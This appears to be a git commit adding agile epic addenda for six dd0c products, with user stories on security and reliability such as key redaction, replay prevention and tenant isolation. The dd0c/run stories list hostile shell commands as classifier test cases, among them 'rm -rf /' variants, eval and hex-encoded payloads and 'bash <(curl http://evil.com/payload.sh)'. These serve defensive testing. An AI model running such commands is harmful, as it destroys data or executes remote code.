Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting):
- P1 route: 8pts (key redaction, SSE billing, token math, CI runner)
- P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber)
- P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation)
- P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier)
- P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback)
- P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures)

Total: 61 story points across 30 new stories
This commit is contained in:
2026-03-01 02:27:55 +00:00
parent cc003cbb1c
commit 72a0f26a7b
6 changed files with 449 additions and 0 deletions

View File

@@ -0,0 +1,64 @@
# dd0c/route — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Proxy Engine
### Story 1.5: API Key Redaction in Error Traces
As a security-conscious developer, I want all API keys scrubbed from panic traces, error logs, and telemetry events, so that a proxy crash never leaks customer credentials.
**Acceptance Criteria:**
- Custom panic handler intercepts all panics and runs `redact_sensitive()` before logging.
- Regex patterns cover `sk-*`, `sk-ant-*`, `sk-proj-*`, `Bearer *` tokens.
- Telemetry events never contain raw API keys (verified by unit test scanning serialized JSON).
- Error responses to clients never echo back the Authorization header value.
**Estimate:** 2 points
### Story 1.6: SSE Disconnect Billing Accuracy
As an engineering manager, I want billing to reflect only the tokens actually streamed to the client, so that early disconnects don't charge for undelivered tokens.
**Acceptance Criteria:**
- When a client disconnects mid-stream, the proxy aborts the upstream connection within 1 second.
- Usage record reflects only tokens in chunks that were successfully flushed to the client.
- Disconnect during prompt processing (before first token) records 0 completion tokens.
- Provider connection count returns to 0 after client disconnect (no leaked connections).
**Estimate:** 3 points
---
## Epic 2 Addendum: Router Brain
### Story 2.5: Token Calculation Edge Cases
As a billing-accurate platform, I want token counting to handle Unicode, CJK, and emoji correctly per provider tokenizer, so that cost calculations match provider invoices within 1%.
**Acceptance Criteria:**
- Uses `cl100k_base` for OpenAI models, Claude tokenizer for Anthropic models.
- Token count for emoji sequences (🌍🔥) matches provider's count within 1%.
- CJK characters tokenized correctly (each char = 1+ tokens).
- Property test: 10K random strings, our count vs mock provider count within 1% tolerance.
**Estimate:** 2 points
---
## Epic 8 Addendum: Infrastructure & DevOps
### Story 8.7: Dedicated CI Runner for Latency Benchmarks
As a solo founder, I want proxy latency benchmarks to run on a dedicated self-hosted runner (NAS), so that P99 measurements are reproducible and not polluted by shared CI noise.
**Acceptance Criteria:**
- GitHub Actions workflow triggers on pushes to `src/proxy/**`.
- Runs `cargo bench --bench proxy_latency` on self-hosted runner.
- Fails the build if P99 exceeds 5ms.
- Results stored in `target/criterion/` for trend tracking.
**Estimate:** 1 point
---
**Total Addendum:** 8 points across 4 stories

View File

@@ -0,0 +1,77 @@
# dd0c/drift — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 2 Addendum: Agent Communication
### Story 2.7: mTLS Revocation — Instant Lockout
As a security-conscious platform operator, I want revoked agent certificates to be instantly locked out (including active connections), so that a compromised agent cannot continue sending data.
**Acceptance Criteria:**
- CRL refresh triggers within 30 seconds of cert revocation.
- Existing mTLS connections from revoked certs are terminated (not just new connections rejected).
- New connection attempts with revoked certs return TLS handshake failure.
- Payload replay with captured nonce returns HTTP 409 Conflict.
**Estimate:** 3 points
---
## Epic 3 Addendum: Drift Analysis Engine
### Story 3.8: Terraform State Lock Recovery on Panic
As a customer, I want the panic button to safely release Terraform state locks, so that hitting "stop" doesn't brick my infrastructure.
**Acceptance Criteria:**
- Panic mode triggers `terraform force-unlock` if normal unlock fails.
- State lock is verified released within 10 seconds of panic signal.
- Agent logs the force-unlock attempt for audit trail.
- If both unlock methods fail, agent alerts the admin with the lock ID for manual recovery.
**Estimate:** 3 points
### Story 3.9: pgmq Visibility Timeout for Long Scans
As a self-hosted operator, I want long-running drift scans to extend their pgmq visibility timeout, so that a second worker doesn't pick up the same job mid-scan.
**Acceptance Criteria:**
- Worker extends visibility by 2 minutes every 90 seconds during processing.
- No duplicate processing occurs for scans taking up to 15 minutes.
- If worker crashes without extending, job becomes visible after timeout (correct behavior).
**Estimate:** 2 points
---
## Epic 5 Addendum: Dashboard API
### Story 5.8: RLS Connection Pool Leak Prevention
As a multi-tenant SaaS, I want PgBouncer to clear tenant context between requests, so that Tenant A's drift data never leaks to Tenant B.
**Acceptance Criteria:**
- `SET LOCAL app.tenant_id` is cleared on connection return to pool.
- 100 concurrent tenant requests produce zero cross-tenant data leakage.
- Stress test with interleaved tenant requests on same PgBouncer connection passes.
**Estimate:** 2 points
---
## Epic 10 Addendum: Transparent Factory Compliance
### Story 10.6: Secret Scrubber Entropy Scanning
As a security-first platform, I want the secret scrubber to detect high-entropy strings (not just regex patterns), so that Base64-encoded keys and custom tokens are caught.
**Acceptance Criteria:**
- Shannon entropy > 3.5 bits/char on strings > 20 chars triggers redaction.
- Base64-encoded AWS keys detected and scrubbed.
- Multi-line RSA private keys detected and replaced with `[REDACTED RSA KEY]`.
- Normal log messages (low entropy) are not false-positived.
**Estimate:** 2 points
---
**Total Addendum:** 12 points across 5 stories

View File

@@ -0,0 +1,76 @@
# dd0c/alert — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Webhook Ingestion
### Story 1.6: HMAC Timestamp Freshness (Replay Prevention)
As a security-conscious operator, I want webhook payloads older than 5 minutes to be rejected, so that captured webhooks cannot be replayed to flood my ingestion pipeline.
**Acceptance Criteria:**
- Datadog: Rejects `dd-webhook-timestamp` older than 300 seconds.
- PagerDuty: Rejects payloads with missing timestamp header.
- OpsGenie: Extracts timestamp from payload body and validates freshness.
- Fresh webhooks (within 5-minute window) are accepted normally.
**Estimate:** 2 points
### Story 1.7: SQS 256KB Claim-Check Round-Trip
As a reliable ingestion pipeline, I want large alert payloads (>256KB) to round-trip through S3 claim-check without data loss, so that high-cardinality incidents are fully preserved.
**Acceptance Criteria:**
- Payloads > 256KB are compressed and stored in S3; SQS message contains S3 pointer.
- Correlation engine fetches from S3 and processes the full payload.
- S3 fetch timeout (10s) sends message to DLQ without crashing the engine.
- Engine health check returns 200 after S3 timeout recovery.
**Estimate:** 3 points
---
## Epic 2 Addendum: Correlation Engine
### Story 2.6: Out-of-Order Alert Delivery
As a reliable correlation engine, I want late-arriving alerts to attach to existing incidents (not create duplicates), so that distributed monitoring delays don't fragment the incident timeline.
**Acceptance Criteria:**
- Alert arriving after window close but within 2x window attaches to existing incident.
- Alert arriving after 3x window creates a new incident.
- Attached alerts update the incident timeline with correct original timestamp.
**Estimate:** 2 points
---
## Epic 5 Addendum: Slack Bot
### Story 5.6: Free Tier Enforcement (10K alerts/month)
As a PLG product, I want free tier tenants limited to 10K alerts/month with 7-day retention, so that the free tier is sustainable and upgrades are incentivized.
**Acceptance Criteria:**
- Alert at count 9,999 accepted; alert at count 10,001 returns 429 with Stripe upgrade URL.
- Counter resets on first of each month.
- Data older than 7 days purged for free tier; 90-day retention for pro tier.
**Estimate:** 2 points
---
## Epic 6 Addendum: Dashboard API
### Story 6.7: Cross-Tenant Negative Isolation Tests
As a multi-tenant SaaS, I want explicit negative tests proving Tenant A cannot read Tenant B's data, so that confused deputy vulnerabilities are caught before launch.
**Acceptance Criteria:**
- Tenant A query returns zero Tenant B incidents (explicit assertion, not just "works for A").
- Cross-tenant incident access returns 404 (not 403 — don't leak existence).
- Tenant A analytics reflect only Tenant A's alert count.
**Estimate:** 1 point
---
**Total Addendum:** 10 points across 5 stories

View File

@@ -0,0 +1,76 @@
# dd0c/portal — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: AWS Discovery Engine
### Story 1.7: Partial Scan Failure Recovery
As a catalog operator, I want partial discovery scan failures (timeout, rate limit) to preserve existing catalog entries, so that a flaky AWS API call doesn't delete half my service catalog.
**Acceptance Criteria:**
- Partial AWS scan (500 of 1000 resources) stages results without committing; all 1000 existing entries preserved.
- Partial GitHub scan (rate limited at 50 of 100) preserves all 100 ownership mappings.
- Scan failure triggers admin alert (not silent failure).
**Estimate:** 3 points
---
## Epic 2 Addendum: GitHub Discovery
### Story 2.6: Ownership Conflict Resolution
As a catalog operator, I want explicit ownership sources (CODEOWNERS/config) to override implicit sources (AWS tags) and heuristics (commit history), so that ownership is deterministic and predictable.
**Acceptance Criteria:**
- Priority: Explicit (CODEOWNERS/config) > Implicit (AWS tags) > Heuristic (commits).
- Concurrent discovery from two sources does not create duplicate catalog entries.
- Heuristic inference does not override an explicitly set owner.
**Estimate:** 2 points
---
## Epic 4 Addendum: Search Engine
### Story 4.5: Meilisearch Zero-Downtime Index Rebuild
As a catalog user, I want Cmd+K search to work during index rebuilds, so that reindexing doesn't cause downtime.
**Acceptance Criteria:**
- Search returns results during active index rebuild (swap-based rebuild).
- Rebuild failure does not corrupt the active index.
- Cmd+K prefix search from Redis cache returns in <10ms.
**Estimate:** 2 points
---
## Epic 8 Addendum: Infrastructure & DevOps
### Story 8.7: VCR Cassette Freshness CI
As a maintainer, I want VCR cassettes re-recorded weekly against real AWS, so that API response drift is caught before it breaks integration tests.
**Acceptance Criteria:**
- Weekly CI job (Monday 6 AM UTC) re-records cassettes with real AWS credentials.
- Creates PR if any cassettes changed (API drift detected).
- Diff summary shows which cassettes changed and by how much.
**Estimate:** 1 point
---
## Epic 9 Addendum: Onboarding & PLG
### Story 9.6: Free Tier Enforcement (50 Services)
As a PLG product, I want free tier tenants limited to 50 services, so that the free tier is sustainable.
**Acceptance Criteria:**
- 50th service creation succeeds; 51st returns 403 with upgrade prompt.
**Estimate:** 1 point
---
**Total Addendum:** 9 points across 5 stories

View File

@@ -0,0 +1,75 @@
# dd0c/cost — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 2 Addendum: Anomaly Detection Engine
### Story 2.8: Concurrent Baseline Update Conflict Resolution
As a reliable anomaly detector, I want concurrent Lambda invocations updating the same baseline to converge correctly via DynamoDB conditional writes, so that Welford running stats are never corrupted.
**Acceptance Criteria:**
- Two simultaneous updates to the same baseline both succeed (one retries via ConditionalCheckFailed).
- Final baseline count reflects both observations.
- Retry reads fresh baseline before re-applying the update.
**Estimate:** 2 points
### Story 2.9: Property-Based Anomaly Scorer Validation (10K runs)
As a mathematically sound anomaly detector, I want the scorer validated with 10K property-based test runs, so that edge cases in the scoring function are caught before launch.
**Acceptance Criteria:**
- Score is always between 0 and 100 for any valid input (10K runs, seed=42).
- Score monotonically increases as cost increases (10K runs).
- Reproducible via fixed seed.
**Estimate:** 1 point
---
## Epic 3 Addendum: Notification Service
### Story 3.7: Remediation RBAC (Slack Action Authorization)
As a security-conscious operator, I want only account owners to trigger destructive remediation actions (Stop Instance), so that a random Slack viewer can't shut down production.
**Acceptance Criteria:**
- Owner role can trigger "Stop Instance" (200).
- Viewer role gets 403 with "insufficient permissions".
- User from different Slack workspace gets 403.
- Non-destructive actions (snooze, mark-expected) allowed for all authenticated users.
**Estimate:** 2 points
---
## Epic 4 Addendum: Customer Onboarding
### Story 4.7: Clock Interface for Governance Tests
As a testable governance engine, I want time-dependent logic (14-day auto-promotion) to use an injectable Clock interface, so that governance tests are deterministic and don't depend on wall-clock time.
**Acceptance Criteria:**
- `FakeClock` can be injected into `GovernanceEngine`.
- Day 13: no promotion. Day 15 + low FP rate: promotion. Day 15 + high FP rate: no promotion.
- No `Date.now()` calls in governance logic — all via Clock interface.
**Estimate:** 1 point
---
## Epic 8 Addendum: Infrastructure & DevOps
### Story 8.7: Redis Failure Safe Default for Panic Mode
As a resilient platform, I want panic mode checks to default to "active" (safe) when Redis is unreachable, so that a Redis outage doesn't accidentally disable safety controls.
**Acceptance Criteria:**
- Redis disconnect → `checkPanicMode()` returns `true` (panic active).
- Warning logged: "Redis unreachable — defaulting to panic=active".
- Normal operation resumes when Redis reconnects.
**Estimate:** 1 point
---
**Total Addendum:** 7 points across 5 stories

View File

@@ -0,0 +1,81 @@
# dd0c/run — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Runbook Parser
### Story 1.7: Shell AST Parsing (Not Regex)
As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
**Acceptance Criteria:**
- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
- `eval $(echo 'rm -rf /')` classified as Dangerous.
- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
- Heredoc with embedded danger classified as Dangerous.
- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
- `kubectl get pods -n production` classified as Safe.
**Estimate:** 5 points
---
## Epic 2 Addendum: Action Classifier
### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
**Acceptance Criteria:**
- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
- All 50 classified as Dangerous — any miss is a blocking CI failure.
- Suite count assertion prevents accidental removal of canary commands.
- Runs on every push and PR.
**Estimate:** 2 points
---
## Epic 3 Addendum: Execution Engine
### Story 3.8: Intervention Deadlock TTL
As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
**Acceptance Criteria:**
- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
- FailedClosed triggers out-of-band critical alert with execution context.
- Human resolution before TTL transitions to Complete (no FailedClosed).
**Estimate:** 2 points
---
## Epic 5 Addendum: Audit Trail
### Story 5.7: Streaming Append-Only Audit with Hash Chain
As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
**Acceptance Criteria:**
- Audit event available within 100ms of command execution (no batching).
- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
- WAL (write-ahead log): events survive agent crash and are recoverable.
**Estimate:** 3 points
### Story 5.8: Cryptographic Signatures for Agent Updates
As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
**Acceptance Criteria:**
- Agent rejects binary update with invalid signature.
- Agent rejects policy update signed only by SaaS key (requires customer key).
- Agent accepts update with valid customer signature.
- Failed signature verification falls back to existing policy (no degradation).
**Estimate:** 3 points
---
**Total Addendum:** 15 points across 5 stories